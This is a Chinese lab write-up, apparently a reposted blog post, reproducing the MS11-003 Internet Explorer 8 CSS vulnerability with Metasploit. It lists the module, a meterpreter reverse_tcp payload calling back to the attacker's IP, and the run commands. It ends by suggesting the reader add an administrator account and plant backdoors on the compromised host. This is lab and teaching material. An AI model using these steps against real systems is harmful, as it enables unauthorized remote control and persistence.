漏洞复现 MS11-003

0x01漏洞简介

ms11-003(windows7IE溢出攻击) 是利用IE8中对css的解析存在一个问题,导致任何访问包含非法css的页面将导致IE8崩溃重启的漏洞。

0x02环境准备

攻击机:kali Linux      IP:172.16.11.7

靶    机:Win7旗舰版  IP:172.16.11.17

0x03复现步骤

首先需要将靶机防火墙关闭

 1.在kali中加载Metasploit工具

2.搜索漏洞利用模块

命令:search ms11-003

3.使用exploit/windows/browser/ms11_003_ie_css_import攻击模块

命令:use exploit/windows/browser/ms11_003_ie_css_import

显示 payloads:show payloads
选择 windows/meterpreter/reverse_tcp这一条
设置:set payload windows/meterpreter/reverse_tcp

 

set srvhost 172.16.11.7(攻击机ip)
set lhost 172.16.11.7(攻击机ip)

4.查看配置情况

show options

URIPATH默认为随机数,可以不设置,为了方便后面使用,在这里可任意设置一个固定值

 5.以上参数配置完成后可进行攻击

命令: run (或exploit)

会生成一条攻击url,将此url复制到靶机IE浏览器地址栏中访问

同时kali中会返回如下信息:

 6.出现该信息证明已经攻击成功,可以sessions命令查看会话

选择任意会话连接,即可进入靶机控制台

 此时可进行进一步渗透,创建管理员账户,搭配其他工具留后门等。出现乱码时可用"chcp65001"命令更改编码。该漏洞复现完成.

猜你喜欢

转载自www.cnblogs.com/Aurstin/p/13163014.html
今日推荐